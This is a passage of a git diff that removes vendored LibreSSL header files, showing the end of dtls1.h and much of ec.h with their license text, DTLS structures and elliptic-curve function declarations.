- * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
- * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
- * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
- * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
- * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
- * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
- * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
- * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
- * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
- * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
- * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
- * OF THE POSSIBILITY OF SUCH DAMAGE.
- * ====================================================================
- *
- * This product includes cryptographic software written by Eric Young
- * (eay@cryptsoft.com).  This product includes software written by Tim
- * Hudson (tjh@cryptsoft.com).
- *
- */
-
-#ifndef HEADER_DTLS1_H
-#define HEADER_DTLS1_H
-
-#if defined(_WIN32)
-#include <winsock2.h>
-#else
-#include <sys/time.h>
-#endif
-
-#include <stdio.h>
-#include <stdlib.h>
-#include <string.h>
-
-#include <openssl/opensslconf.h>
-#include <openssl/buffer.h>
-
-#ifdef  __cplusplus
-extern "C" {
-#endif
-
-#define DTLS1_VERSION			0xFEFF
-
-/* lengths of messages */
-#define DTLS1_COOKIE_LENGTH                     256
-
-#define DTLS1_RT_HEADER_LENGTH                  13
-
-#define DTLS1_HM_HEADER_LENGTH                  12
-
-#define DTLS1_HM_BAD_FRAGMENT                   -2
-#define DTLS1_HM_FRAGMENT_RETRY                 -3
-
-#define DTLS1_CCS_HEADER_LENGTH                  1
-
-#ifdef DTLS1_AD_MISSING_HANDSHAKE_MESSAGE
-#define DTLS1_AL_HEADER_LENGTH                   7
-#else
-#define DTLS1_AL_HEADER_LENGTH                   2
-#endif
-
-#ifndef OPENSSL_NO_SSL_INTERN
-
-
-typedef struct dtls1_bitmap_st {
-	unsigned long map;		/* track 32 packets on 32-bit systems
-					   and 64 - on 64-bit systems */
-	unsigned char max_seq_num[8];	/* max record number seen so far,
-					   64-bit value in big-endian
-					   encoding */
-} DTLS1_BITMAP;
-
-struct dtls1_retransmit_state {
-	EVP_CIPHER_CTX *enc_write_ctx;	/* cryptographic state */
-	EVP_MD_CTX *write_hash;		/* used for mac generation */
-	SSL_SESSION *session;
-	unsigned short epoch;
-};
-
-struct hm_header_st {
-	unsigned char type;
-	unsigned long msg_len;
-	unsigned short seq;
-	unsigned long frag_off;
-	unsigned long frag_len;
-	unsigned int is_ccs;
-	struct dtls1_retransmit_state saved_retransmit_state;
-};
-
-struct ccs_header_st {
-	unsigned char type;
-	unsigned short seq;
-};
-
-struct dtls1_timeout_st {
-	/* Number of read timeouts so far */
-	unsigned int read_timeouts;
-
-	/* Number of write timeouts so far */
-	unsigned int write_timeouts;
-
-	/* Number of alerts received so far */
-	unsigned int num_alerts;
-};
-
-struct _pqueue;
-
-typedef struct record_pqueue_st {
-	unsigned short epoch;
-	struct _pqueue *q;
-} record_pqueue;
-
-typedef struct hm_fragment_st {
-	struct hm_header_st msg_header;
-	unsigned char *fragment;
-	unsigned char *reassembly;
-} hm_fragment;
-
-struct dtls1_state_internal_st;
-
-typedef struct dtls1_state_st {
-	/* Buffered (sent) handshake records */
-	struct _pqueue *sent_messages;
-
-	/* Indicates when the last handshake msg or heartbeat sent will timeout */
-	struct timeval next_timeout;
-
-	/* Timeout duration */
-	unsigned short timeout_duration;
-
-	struct dtls1_state_internal_st *internal;
-} DTLS1_STATE;
-
-typedef struct dtls1_record_data_st {
-	unsigned char *packet;
-	unsigned int   packet_length;
-	SSL3_BUFFER    rbuf;
-	SSL3_RECORD    rrec;
-} DTLS1_RECORD_DATA;
-
-#endif
-
-/* Timeout multipliers (timeout slice is defined in apps/timeouts.h */
-#define DTLS1_TMO_READ_COUNT                      2
-#define DTLS1_TMO_WRITE_COUNT                     2
-
-#define DTLS1_TMO_ALERT_COUNT                     12
-
-#ifdef  __cplusplus
-}
-#endif
-#endif
diff --git a/thirdparty/libressl/include/openssl/ec.h b/thirdparty/libressl/include/openssl/ec.h
deleted file mode 100644
index dc70cfa..0000000
--- a/thirdparty/libressl/include/openssl/ec.h
+++ /dev/null
@@ -1,1169 +0,0 @@
-/* $OpenBSD: ec.h,v 1.12 2016/11/04 17:33:19 miod Exp $ */
-/*
- * Originally written by Bodo Moeller for the OpenSSL project.
- */
-/**
- * \file crypto/ec/ec.h Include file for the OpenSSL EC functions
- * \author Originally written by Bodo Moeller for the OpenSSL project
- */
-/* ====================================================================
- * Copyright (c) 1998-2005 The OpenSSL Project.  All rights reserved.
- *
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted provided that the following conditions
- * are met:
- *
- * 1. Redistributions of source code must retain the above copyright
- *    notice, this list of conditions and the following disclaimer. 
- *
- * 2. Redistributions in binary form must reproduce the above copyright
- *    notice, this list of conditions and the following disclaimer in
- *    the documentation and/or other materials provided with the
- *    distribution.
- *
- * 3. All advertising materials mentioning features or use of this
- *    software must display the following acknowledgment:
- *    "This product includes software developed by the OpenSSL Project
- *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
- *
- * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
- *    endorse or promote products derived from this software without
- *    prior written permission. For written permission, please contact
- *    openssl-core@openssl.org.
- *
- * 5. Products derived from this software may not be called "OpenSSL"
- *    nor may "OpenSSL" appear in their names without prior written
- *    permission of the OpenSSL Project.
- *
- * 6. Redistributions of any form whatsoever must retain the following
- *    acknowledgment:
- *    "This product includes software developed by the OpenSSL Project
- *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
- *
- * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
- * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
- * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
- * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
- * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
- * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
- * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
- * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
- * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
- * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
- * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
- * OF THE POSSIBILITY OF SUCH DAMAGE.
- * ====================================================================
- *
- * This product includes cryptographic software written by Eric Young
- * (eay@cryptsoft.com).  This product includes software written by Tim
- * Hudson (tjh@cryptsoft.com).
- *
- */
-/* ====================================================================
- * Copyright 2002 Sun Microsystems, Inc. ALL RIGHTS RESERVED.
- *
- * Portions of the attached software ("Contribution") are developed by 
- * SUN MICROSYSTEMS, INC., and are contributed to the OpenSSL project.
- *
- * The Contribution is licensed pursuant to the OpenSSL open source
- * license provided above.
- *
- * The elliptic curve binary polynomial software is originally written by 
- * Sheueling Chang Shantz and Douglas Stebila of Sun Microsystems Laboratories.
- *
- */
-
-#ifndef HEADER_EC_H
-#define HEADER_EC_H
-
-#include <openssl/opensslconf.h>
-
-#ifdef OPENSSL_NO_EC
-#error EC is disabled.
-#endif
-
-#include <openssl/asn1.h>
-#ifndef OPENSSL_NO_DEPRECATED
-#include <openssl/bn.h>
-#endif
-
-#ifdef  __cplusplus
-extern "C" {
-#elif defined(__SUNPRO_C)
-# if __SUNPRO_C >= 0x520
-# pragma error_messages (off,E_ARRAY_OF_INCOMPLETE_NONAME,E_ARRAY_OF_INCOMPLETE)
-# endif
-#endif
-
-  
-#ifndef OPENSSL_ECC_MAX_FIELD_BITS
-# define OPENSSL_ECC_MAX_FIELD_BITS 661
-#endif
-
-/** Enum for the point conversion form as defined in X9.62 (ECDSA)
- *  for the encoding of a elliptic curve point (x,y) */
-typedef enum {
-	/** the point is encoded as z||x, where the octet z specifies 
-	 *  which solution of the quadratic equation y is  */
-	POINT_CONVERSION_COMPRESSED = 2,
-	/** the point is encoded as z||x||y, where z is the octet 0x02  */
-	POINT_CONVERSION_UNCOMPRESSED = 4,
-	/** the point is encoded as z||x||y, where the octet z specifies
-         *  which solution of the quadratic equation y is  */
-	POINT_CONVERSION_HYBRID = 6
-} point_conversion_form_t;
-
-
-typedef struct ec_method_st EC_METHOD;
-
-typedef struct ec_group_st
-	/*
-	 EC_METHOD *meth;
-	 -- field definition
-	 -- curve coefficients
-	 -- optional generator with associated information (order, cofactor)
-	 -- optional extra data (precomputed table for fast computation of multiples of generator)
-	 -- ASN1 stuff
-	*/
-	EC_GROUP;
-
-typedef struct ec_point_st EC_POINT;
-
-
-/********************************************************************/
-/*               EC_METHODs for curves over GF(p)                   */       
-/********************************************************************/
-
-/** Returns the basic GFp ec methods which provides the basis for the
- *  optimized methods. 
- *  \return  EC_METHOD object
- */
-const EC_METHOD *EC_GFp_simple_method(void);
-
-/** Returns GFp methods using montgomery multiplication.
- *  \return  EC_METHOD object
- */
-const EC_METHOD *EC_GFp_mont_method(void);
-
-/** Returns GFp methods using optimized methods for NIST recommended curves
- *  \return  EC_METHOD object
- */
-const EC_METHOD *EC_GFp_nist_method(void);
-
-#ifndef OPENSSL_NO_EC_NISTP_64_GCC_128
-/** Returns 64-bit optimized methods for nistp224
- *  \return  EC_METHOD object
- */
-const EC_METHOD *EC_GFp_nistp224_method(void);
-
-/** Returns 64-bit optimized methods for nistp256
- *  \return  EC_METHOD object
- */
-const EC_METHOD *EC_GFp_nistp256_method(void);
-
-/** Returns 64-bit optimized methods for nistp521
- *  \return  EC_METHOD object
- */
-const EC_METHOD *EC_GFp_nistp521_method(void);
-#endif
-
-#ifndef OPENSSL_NO_EC2M
-/********************************************************************/ 
-/*           EC_METHOD for curves over GF(2^m)                      */
-/********************************************************************/
-
-/** Returns the basic GF2m ec method 
- *  \return  EC_METHOD object
- */
-const EC_METHOD *EC_GF2m_simple_method(void);
-
-#endif
-
-
-/********************************************************************/
-/*                   EC_GROUP functions                             */
-/********************************************************************/
-
-/** Creates a new EC_GROUP object
- *  \param   meth  EC_METHOD to use
- *  \return  newly created EC_GROUP object or NULL in case of an error.
- */
-EC_GROUP *EC_GROUP_new(const EC_METHOD *meth);
-
-/** Frees a EC_GROUP object
- *  \param  group  EC_GROUP object to be freed.
- */
-void EC_GROUP_free(EC_GROUP *group);
-
-/** Clears and frees a EC_GROUP object
- *  \param  group  EC_GROUP object to be cleared and freed.
- */
-void EC_GROUP_clear_free(EC_GROUP *group);
-
-/** Copies EC_GROUP objects. Note: both EC_GROUPs must use the same EC_METHOD.
- *  \param  dst  destination EC_GROUP object
- *  \param  src  source EC_GROUP object
- *  \return 1 on success and 0 if an error occurred.
- */
-int EC_GROUP_copy(EC_GROUP *dst, const EC_GROUP *src);
-
-/** Creates a new EC_GROUP object and copies the copies the content
- *  form src to the newly created EC_KEY object
- *  \param  src  source EC_GROUP object
- *  \return newly created EC_GROUP object or NULL in case of an error.
- */
-EC_GROUP *EC_GROUP_dup(const EC_GROUP *src);
-
-/** Returns the EC_METHOD of the EC_GROUP object.
- *  \param  group  EC_GROUP object 
- *  \return EC_METHOD used in this EC_GROUP object.
- */
-const EC_METHOD *EC_GROUP_method_of(const EC_GROUP *group);
-
-/** Returns the field type of the EC_METHOD.
- *  \param  meth  EC_METHOD object
- *  \return NID of the underlying field type OID.
- */
-int EC_METHOD_get_field_type(const EC_METHOD *meth);
-
-/** Sets the generator and it's order/cofactor of a EC_GROUP object.
- *  \param  group      EC_GROUP object 
- *  \param  generator  EC_POINT object with the generator.
- *  \param  order      the order of the group generated by the generator.
- *  \param  cofactor   the index of the sub-group generated by the generator
- *                     in the group of all points on the elliptic curve.
- *  \return 1 on success and 0 if an error occured
- */
-int EC_GROUP_set_generator(EC_GROUP *group, const EC_POINT *generator, const BIGNUM *order, const BIGNUM *cofactor);
-
-/** Returns the generator of a EC_GROUP object.
- *  \param  group  EC_GROUP object
- *  \return the currently used generator (possibly NULL).
- */
-const EC_POINT *EC_GROUP_get0_generator(const EC_GROUP *group);
-
-/** Gets the order of a EC_GROUP
- *  \param  group  EC_GROUP object
- *  \param  order  BIGNUM to which the order is copied
- *  \param  ctx    BN_CTX object (optional)
- *  \return 1 on success and 0 if an error occured
- */
-int EC_GROUP_get_order(const EC_GROUP *group, BIGNUM *order, BN_CTX *ctx);
-
-/** Gets the cofactor of a EC_GROUP
- *  \param  group     EC_GROUP object
- *  \param  cofactor  BIGNUM to which the cofactor is copied
- *  \param  ctx       BN_CTX object (optional)
- *  \return 1 on success and 0 if an error occured
- */
-int EC_GROUP_get_cofactor(const EC_GROUP *group, BIGNUM *cofactor, BN_CTX *ctx);
-
-/** Sets the name of a EC_GROUP object
- *  \param  group  EC_GROUP object
- *  \param  nid    NID of the curve name OID
- */
-void EC_GROUP_set_curve_name(EC_GROUP *group, int nid);
-
-/** Returns the curve name of a EC_GROUP object
- *  \param  group  EC_GROUP object
- *  \return NID of the curve name OID or 0 if not set.
- */
-int EC_GROUP_get_curve_name(const EC_GROUP *group);
-
-void EC_GROUP_set_asn1_flag(EC_GROUP *group, int flag);
-int EC_GROUP_get_asn1_flag(const EC_GROUP *group);
-
-void EC_GROUP_set_point_conversion_form(EC_GROUP *group, point_conversion_form_t form);
-point_conversion_form_t EC_GROUP_get_point_conversion_form(const EC_GROUP *);
-
-unsigned char *EC_GROUP_get0_seed(const EC_GROUP *x);
-size_t EC_GROUP_get_seed_len(const EC_GROUP *);
-size_t EC_GROUP_set_seed(EC_GROUP *, const unsigned char *, size_t len);
-
-/** Sets the parameter of a ec over GFp defined by y^2 = x^3 + a*x + b
- *  \param  group  EC_GROUP object
- *  \param  p      BIGNUM with the prime number
- *  \param  a      BIGNUM with parameter a of the equation
- *  \param  b      BIGNUM with parameter b of the equation
- *  \param  ctx    BN_CTX object (optional)
- *  \return 1 on success and 0 if an error occured
- */
-int EC_GROUP_set_curve_GFp(EC_GROUP *group, const BIGNUM *p, const BIGNUM *a, const BIGNUM *b, BN_CTX *ctx);
-
-/** Gets the parameter of the ec over GFp defined by y^2 = x^3 + a*x + b
- *  \param  group  EC_GROUP object
- *  \param  p      BIGNUM for the prime number
- *  \param  a      BIGNUM for parameter a of the equation
- *  \param  b      BIGNUM for parameter b of the equation
- *  \param  ctx    BN_CTX object (optional)
- *  \return 1 on success and 0 if an error occured
- */
-int EC_GROUP_get_curve_GFp(const EC_GROUP *group, BIGNUM *p, BIGNUM *a, BIGNUM *b, BN_CTX *ctx);
-
-#ifndef OPENSSL_NO_EC2M
-/** Sets the parameter of a ec over GF2m defined by y^2 + x*y = x^3 + a*x^2 + b
- *  \param  group  EC_GROUP object
- *  \param  p      BIGNUM with the polynomial defining the underlying field
- *  \param  a      BIGNUM with parameter a of the equation
- *  \param  b      BIGNUM with parameter b of the equation
- *  \param  ctx    BN_CTX object (optional)
- *  \return 1 on success and 0 if an error occured
- */
-int EC_GROUP_set_curve_GF2m(EC_GROUP *group, const BIGNUM *p, const BIGNUM *a, const BIGNUM *b, BN_CTX *ctx);
-
-/** Gets the parameter of the ec over GF2m defined by y^2 + x*y = x^3 + a*x^2 + b
- *  \param  group  EC_GROUP object
- *  \param  p      BIGNUM for the polynomial defining the underlying field
- *  \param  a      BIGNUM for parameter a of the equation
- *  \param  b      BIGNUM for parameter b of the equation
- *  \param  ctx    BN_CTX object (optional)
- *  \return 1 on success and 0 if an error occured
- */
-int EC_GROUP_get_curve_GF2m(const EC_GROUP *group, BIGNUM *p, BIGNUM *a, BIGNUM *b, BN_CTX *ctx);
-#endif
-/** Returns the number of bits needed to represent a field element 
- *  \param  group  EC_GROUP object
- *  \return number of bits needed to represent a field element
- */
-int EC_GROUP_get_degree(const EC_GROUP *group);
-
-/** Checks whether the parameter in the EC_GROUP define a valid ec group
- *  \param  group  EC_GROUP object
- *  \param  ctx    BN_CTX object (optional)
- *  \return 1 if group is a valid ec group and 0 otherwise
- */
-int EC_GROUP_check(const EC_GROUP *group, BN_CTX *ctx);
-
-/** Checks whether the discriminant of the elliptic curve is zero or not
- *  \param  group  EC_GROUP object
- *  \param  ctx    BN_CTX object (optional)
- *  \return 1 if the discriminant is not zero and 0 otherwise
- */
-int EC_GROUP_check_discriminant(const EC_GROUP *group, BN_CTX *ctx);
-
-/** Compares two EC_GROUP objects
- *  \param  a    first EC_GROUP object
- *  \param  b    second EC_GROUP object
- *  \param  ctx  BN_CTX object (optional)
- *  \return 0 if both groups are equal and 1 otherwise
- */
-int EC_GROUP_cmp(const EC_GROUP *a, const EC_GROUP *b, BN_CTX *ctx);
-
-/* EC_GROUP_new_GF*() calls EC_GROUP_new() and EC_GROUP_set_GF*()
- * after choosing an appropriate EC_METHOD */
-
-/** Creates a new EC_GROUP object with the specified parameters defined
- *  over GFp (defined by the equation y^2 = x^3 + a*x + b)
- *  \param  p    BIGNUM with the prime number
- *  \param  a    BIGNUM with the parameter a of the equation
- *  \param  b    BIGNUM with the parameter b of the equation
- *  \param  ctx  BN_CTX object (optional)
- *  \return newly created EC_GROUP object with the specified parameters
- */
-EC_GROUP *EC_GROUP_new_curve_GFp(const BIGNUM *p, const BIGNUM *a, const BIGNUM *b, BN_CTX *ctx);
-#ifndef OPENSSL_NO_EC2M
-/** Creates a new EC_GROUP object with the specified parameters defined
- *  over GF2m (defined by the equation y^2 + x*y = x^3 + a*x^2 + b)
- *  \param  p    BIGNUM with the polynomial defining the underlying field
- *  \param  a    BIGNUM with the parameter a of the equation
- *  \param  b    BIGNUM with the parameter b of the equation
- *  \param  ctx  BN_CTX object (optional)
- *  \return newly created EC_GROUP object with the specified parameters
- */
-EC_GROUP *EC_GROUP_new_curve_GF2m(const BIGNUM *p, const BIGNUM *a, const BIGNUM *b, BN_CTX *ctx);
-#endif
-/** Creates a EC_GROUP object with a curve specified by a NID
- *  \param  nid  NID of the OID of the curve name
- *  \return newly created EC_GROUP object with specified curve or NULL
- *          if an error occurred
- */
-EC_GROUP *EC_GROUP_new_by_curve_name(int nid);
-
-
-/********************************************************************/
-/*               handling of internal curves                        */
-/********************************************************************/
-
-typedef struct { 
-	int nid;
-	const char *comment;
-	} EC_builtin_curve;
-
-/* EC_builtin_curves(EC_builtin_curve *r, size_t size) returns number 
- * of all available curves or zero if a error occurred. 
- * In case r ist not zero nitems EC_builtin_curve structures 
- * are filled with the data of the first nitems internal groups */
-size_t EC_get_builtin_curves(EC_builtin_curve *r, size_t nitems);
-
-const char *EC_curve_nid2nist(int nid);
-int EC_curve_nist2nid(const char *name);
-
-/********************************************************************/
-/*                    EC_POINT functions                            */
-/********************************************************************/
-
-/** Creates a new EC_POINT object for the specified EC_GROUP
- *  \param  group  EC_GROUP the underlying EC_GROUP object
- *  \return newly created EC_POINT object or NULL if an error occurred
- */
-EC_POINT *EC_POINT_new(const EC_GROUP *group);
-
-/** Frees a EC_POINT object
- *  \param  point  EC_POINT object to be freed
- */
-void EC_POINT_free(EC_POINT *point);
-
-/** Clears and frees a EC_POINT object
- *  \param  point  EC_POINT object to be cleared and freed
- */
-void EC_POINT_clear_free(EC_POINT *point);
-
-/** Copies EC_POINT object
- *  \param  dst  destination EC_POINT object
- *  \param  src  source EC_POINT object
- *  \return 1 on success and 0 if an error occured
- */
-int EC_POINT_copy(EC_POINT *dst, const EC_POINT *src);
-
-/** Creates a new EC_POINT object and copies the content of the supplied
- *  EC_POINT
- *  \param  src    source EC_POINT object
- *  \param  group  underlying the EC_GROUP object
- *  \return newly created EC_POINT object or NULL if an error occurred 
- */
-EC_POINT *EC_POINT_dup(const EC_POINT *src, const EC_GROUP *group);
- 
-/** Returns the EC_METHOD used in EC_POINT object 
- *  \param  point  EC_POINT object
- *  \return the EC_METHOD used
- */
-const EC_METHOD *EC_POINT_method_of(const EC_POINT *point);
-
-/** Sets a point to infinity (neutral element)
- *  \param  group  underlying EC_GROUP object
- *  \param  point  EC_POINT to set to infinity
- *  \return 1 on success and 0 if an error occured
- */
-int EC_POINT_set_to_infinity(const EC_GROUP *group, EC_POINT *point);
-
-/** Sets the jacobian projective coordinates of a EC_POINT over GFp
- *  \param  group  underlying EC_GROUP object
- *  \param  p      EC_POINT object
- *  \param  x      BIGNUM with the x-coordinate
- *  \param  y      BIGNUM with the y-coordinate
- *  \param  z      BIGNUM with the z-coordinate
- *  \param  ctx    BN_CTX object (optional)
- *  \return 1 on success and 0 if an error occured
- */
-int EC_POINT_set_Jprojective_coordinates_GFp(const EC_GROUP *group, EC_POINT *p,
-	const BIGNUM *x, const BIGNUM *y, const BIGNUM *z, BN_CTX *ctx);
-
-/** Gets the jacobian projective coordinates of a EC_POINT over GFp
- *  \param  group  underlying EC_GROUP object
- *  \param  p      EC_POINT object
- *  \param  x      BIGNUM for the x-coordinate
- *  \param  y      BIGNUM for the y-coordinate
- *  \param  z      BIGNUM for the z-coordinate
- *  \param  ctx    BN_CTX object (optional)
- *  \return 1 on success and 0 if an error occured
- */
-int EC_POINT_get_Jprojective_coordinates_GFp(const EC_GROUP *group,
-	const EC_POINT *p, BIGNUM *x, BIGNUM *y, BIGNUM *z, BN_CTX *ctx);
-
-/** Sets the affine coordinates of a EC_POINT over GFp
- *  \param  group  underlying EC_GROUP object
- *  \param  p      EC_POINT object
- *  \param  x      BIGNUM with the x-coordinate
- *  \param  y      BIGNUM with the y-coordinate
- *  \param  ctx    BN_CTX object (optional)
- *  \return 1 on success and 0 if an error occured
- */
-int EC_POINT_set_affine_coordinates_GFp(const EC_GROUP *group, EC_POINT *p,
-	const BIGNUM *x, const BIGNUM *y, BN_CTX *ctx);
-
-/** Gets the affine coordinates of a EC_POINT over GFp
- *  \param  group  underlying EC_GROUP object
- *  \param  p      EC_POINT object
- *  \param  x      BIGNUM for the x-coordinate
- *  \param  y      BIGNUM for the y-coordinate
- *  \param  ctx    BN_CTX object (optional)
- *  \return 1 on success and 0 if an error occured
- */
-int EC_POINT_get_affine_coordinates_GFp(const EC_GROUP *group,
-	const EC_POINT *p, BIGNUM *x, BIGNUM *y, BN_CTX *ctx);
-
-/** Sets the x9.62 compressed coordinates of a EC_POINT over GFp
- *  \param  group  underlying EC_GROUP object
- *  \param  p      EC_POINT object
- *  \param  x      BIGNUM with x-coordinate
- *  \param  y_bit  integer with the y-Bit (either 0 or 1)
- *  \param  ctx    BN_CTX object (optional)
- *  \return 1 on success and 0 if an error occured
- */
-int EC_POINT_set_compressed_coordinates_GFp(const EC_GROUP *group, EC_POINT *p,
-	const BIGNUM *x, int y_bit, BN_CTX *ctx);
-#ifndef OPENSSL_NO_EC2M
-/** Sets the affine coordinates of a EC_POINT over GF2m
- *  \param  group  underlying EC_GROUP object
- *  \param  p      EC_POINT object
- *  \param  x      BIGNUM with the x-coordinate
- *  \param  y      BIGNUM with the y-coordinate
- *  \param  ctx    BN_CTX object (optional)
- *  \return 1 on success and 0 if an error occured
- */
-int EC_POINT_set_affine_coordinates_GF2m(const EC_GROUP *group, EC_POINT *p,
-	const BIGNUM *x, const BIGNUM *y, BN_CTX *ctx);
-
-/** Gets the affine coordinates of a EC_POINT over GF2m
- *  \param  group  underlying EC_GROUP object
- *  \param  p      EC_POINT object
- *  \param  x      BIGNUM for the x-coordinate
- *  \param  y      BIGNUM for the y-coordinate
- *  \param  ctx    BN_CTX object (optional)
- *  \return 1 on success and 0 if an error occured
- */
-int EC_POINT_get_affine_coordinates_GF2m(const EC_GROUP *group,
-	const EC_POINT *p, BIGNUM *x, BIGNUM *y, BN_CTX *ctx);
-
-/** Sets the x9.62 compressed coordinates of a EC_POINT over GF2m
- *  \param  group  underlying EC_GROUP object
- *  \param  p      EC_POINT object
- *  \param  x      BIGNUM with x-coordinate
- *  \param  y_bit  integer with the y-Bit (either 0 or 1)
- *  \param  ctx    BN_CTX object (optional)
- *  \return 1 on success and 0 if an error occured
- */
-int EC_POINT_set_compressed_coordinates_GF2m(const EC_GROUP *group, EC_POINT *p,
-	const BIGNUM *x, int y_bit, BN_CTX *ctx);
-#endif
-/** Encodes a EC_POINT object to a octet string
- *  \param  group  underlying EC_GROUP object
- *  \param  p      EC_POINT object
- *  \param  form   point conversion form
- *  \param  buf    memory buffer for the result. If NULL the function returns
- *                 required buffer size.
- *  \param  len    length of the memory buffer
- *  \param  ctx    BN_CTX object (optional)
- *  \return the length of the encoded octet string or 0 if an error occurred
- */
-size_t EC_POINT_point2oct(const EC_GROUP *group, const EC_POINT *p,
-	point_conversion_form_t form,
-        unsigned char *buf, size_t len, BN_CTX *ctx);
-
-/** Decodes a EC_POINT from a octet string
- *  \param  group  underlying EC_GROUP object
- *  \param  p      EC_POINT object
- *  \param  buf    memory buffer with the encoded ec point
- *  \param  len    length of the encoded ec point
- *  \param  ctx    BN_CTX object (optional)
- *  \return 1 on success and 0 if an error occured
- */
-int EC_POINT_oct2point(const EC_GROUP *group, EC_POINT *p,
-        const unsigned char *buf, size_t len, BN_CTX *ctx);
-
-/* other interfaces to point2oct/oct2point: */
-BIGNUM *EC_POINT_point2bn(const EC_GROUP *, const EC_POINT *,
-	point_conversion_form_t form, BIGNUM *, BN_CTX *);
-EC_POINT *EC_POINT_bn2point(const EC_GROUP *, const BIGNUM *,
-	EC_POINT *, BN_CTX *);
-char *EC_POINT_point2hex(const EC_GROUP *, const EC_POINT *,
-	point_conversion_form_t form, BN_CTX *);
-EC_POINT *EC_POINT_hex2point(const EC_GROUP *, const char *,
-	EC_POINT *, BN_CTX *);
-
-
-/********************************************************************/
-/*         functions for doing EC_POINT arithmetic                  */
-/********************************************************************/
-
-/** Computes the sum of two EC_POINT 
- *  \param  group  underlying EC_GROUP object
- *  \param  r      EC_POINT object for the result (r = a + b)
- *  \param  a      EC_POINT object with the first summand
- *  \param  b      EC_POINT object with the second summand
- *  \param  ctx    BN_CTX object (optional)
- *  \return 1 on success and 0 if an error occured
- */
-int EC_POINT_add(const EC_GROUP *group, EC_POINT *r, const EC_POINT *a, const EC_POINT *b, BN_CTX *ctx);
-
-/** Computes the double of a EC_POINT
- *  \param  group  underlying EC_GROUP object
- *  \param  r      EC_POINT object for the result (r = 2 * a)
- *  \param  a      EC_POINT object 
- *  \param  ctx    BN_CTX object (optional)
- *  \return 1 on success and 0 if an error occured
- */
-int EC_POINT_dbl(const EC_GROUP *group, EC_POINT *r, const EC_POINT *a, BN_CTX *ctx);
-
-/** Computes the inverse of a EC_POINT
- *  \param  group  underlying EC_GROUP object
- *  \param  a      EC_POINT object to be inverted (it's used for the result as well)
- *  \param  ctx    BN_CTX object (optional)
- *  \return 1 on success and 0 if an error occured
- */
-int EC_POINT_invert(const EC_GROUP *group, EC_POINT *a, BN_CTX *ctx);
-
-/** Checks whether the point is the neutral element of the group
- *  \param  group  the underlying EC_GROUP object
- *  \param  p      EC_POINT object
- *  \return 1 if the point is the neutral element and 0 otherwise
- */
-int EC_POINT_is_at_infinity(const EC_GROUP *group, const EC_POINT *p);
-
-/** Checks whether the point is on the curve 
- *  \param  group  underlying EC_GROUP object
- *  \param  point  EC_POINT object to check
- *  \param  ctx    BN_CTX object (optional)
- *  \return 1 if point if on the curve and 0 otherwise
- */
-int EC_POINT_is_on_curve(const EC_GROUP *group, const EC_POINT *point, BN_CTX *ctx);
-
-/** Compares two EC_POINTs 
- *  \param  group  underlying EC_GROUP object
- *  \param  a      first EC_POINT object
- *  \param  b      second EC_POINT object
- *  \param  ctx    BN_CTX object (optional)
- *  \return 0 if both points are equal and a value != 0 otherwise
- */
-int EC_POINT_cmp(const EC_GROUP *group, const EC_POINT *a, const EC_POINT *b, BN_CTX *ctx);
-
-int EC_POINT_make_affine(const EC_GROUP *group, EC_POINT *point, BN_CTX *ctx);
-int EC_POINTs_make_affine(const EC_GROUP *group, size_t num, EC_POINT *points[], BN_CTX *ctx);
-
-/** Computes r = generator * n sum_{i=0}^num p[i] * m[i]
- *  \param  group  underlying EC_GROUP object
- *  \param  r      EC_POINT object for the result
- *  \param  n      BIGNUM with the multiplier for the group generator (optional)
- *  \param  num    number futher summands
- *  \param  p      array of size num of EC_POINT objects
- *  \param  m      array of size num of BIGNUM objects
- *  \param  ctx    BN_CTX object (optional)
- *  \return 1 on success and 0 if an error occured
- */
-int EC_POINTs_mul(const EC_GROUP *group, EC_POINT *r, const BIGNUM *n, size_t num, const EC_POINT *p[], const BIGNUM *m[], BN_CTX *ctx);
-
-/** Computes r = generator * n + q * m
- *  \param  group  underlying EC_GROUP object
- *  \param  r      EC_POINT object for the result
- *  \param  n      BIGNUM with the multiplier for the group generator (optional)
- *  \param  q      EC_POINT object with the first factor of the second summand
- *  \param  m      BIGNUM with the second factor of the second summand
- *  \param  ctx    BN_CTX object (optional)
- *  \return 1 on success and 0 if an error occured
- */
-int EC_POINT_mul(const EC_GROUP *group, EC_POINT *r, const BIGNUM *n, const EC_POINT *q, const BIGNUM *m, BN_CTX *ctx);
-
-/** Stores multiples of generator for faster point multiplication
- *  \param  group  EC_GROUP object
- *  \param  ctx    BN_CTX object (optional)
- *  \return 1 on success and 0 if an error occured
- */
